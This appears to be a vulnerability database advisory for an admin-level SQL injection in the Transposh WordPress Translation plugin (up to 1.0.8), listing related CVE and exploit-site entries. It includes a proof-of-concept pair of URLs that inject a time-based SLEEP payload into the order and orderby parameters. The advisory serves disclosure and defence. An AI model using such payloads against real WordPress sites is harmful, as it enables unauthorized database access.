Lucene search
WpvulndbWPVDB-ID:0E0D2C5F-3396-4A0A-A5C6-6A98DE3802C9HistoryJul 26, 2022 - 12:00 a.m.
Transposh WordPress Translation <= 1.0.8 - Admin+ SQL Injection
2022-07-2600:00:00
wpscan.com
16
wordpress
plugin
sql injection
security issue
EPSS
0.001
Percentile
37.7%
The plugin does not sanitise and escape the order and orderby parameters before using them in a SQL statement, leading to a SQL injection
PoC
https://example.com/wp-admin/admin.php?page=tp_editor&action;=filter-by&order;=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b) https://example.com/wp-admin/admin.php?page=tp_editor&action;=filter-by&orderby;=lang+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
Related
zdt
zdt
Transposh WordPress Translation 1.0.8.1 SQL Injection Vulnerability
2022-07-31 00:00:00
nvd
nvd
CVE-2022-25811
2022-08-22 15:15:14
cve
cve
CVE-2022-25811
2022-08-22 15:15:14
packetstorm
packetstorm
Transposh WordPress Translation 1.0.8.1 SQL Injection
2022-07-29 00:00:00
prion
prion
Sql injection
2022-08-22 15:15:00
cnvd
cnvd
WordPress Transposh WordPress Translation SQL Injection Vulnerability
2022-08-02 00:00:00
cvelist
cvelist
wpexploit
wpexploit
Transposh WordPress Translation <= 1.0.8 - Admin+ SQL Injection
2022-07-26 00:00:00